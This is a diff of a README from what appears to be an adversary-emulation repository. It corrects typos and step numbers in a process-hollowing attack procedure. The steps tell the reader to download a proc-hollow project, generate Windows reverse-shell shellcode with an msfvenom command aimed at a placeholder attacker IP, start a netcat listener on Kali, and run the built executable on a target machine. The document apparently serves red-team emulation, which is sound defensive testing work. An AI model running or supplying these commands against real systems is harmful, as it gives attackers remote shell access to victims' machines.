Sam0x90/CTI/Adversary Emulation Plans/2022_Top35_Mitre/Readme.md

 <ins>Attack procedure</ins>

-Download athe following project: https://github.com/bmdyy/proc-hollow It requires, a WIndows machine with Visual Studio and second machine (preferrably a Kali Linux).
+Download the following project: https://github.com/bmdyy/proc-hollow It requires, a Windows machine with Visual Studio and second machine (preferrably a Kali Linux).

 1. Open the project in Visual Studio and modify the "CreateProcess" call with the process of your choice
 2. Use the following msfvenom command to generate a C# shellcode: ```msfvenom -p windows/x64/shell_reverse_tcp LPORT=4443 LHOST=<KALI_IP> -f csharp -v shellcode```
 3. Build
 4. Create a listener on Kali Linux with the following command: ```nc -nlvp 4443```
-3. Run the executable on the target Windows machine
+5. Run the executable on the target Windows machine

 <ins>Cleaning procedure</ins>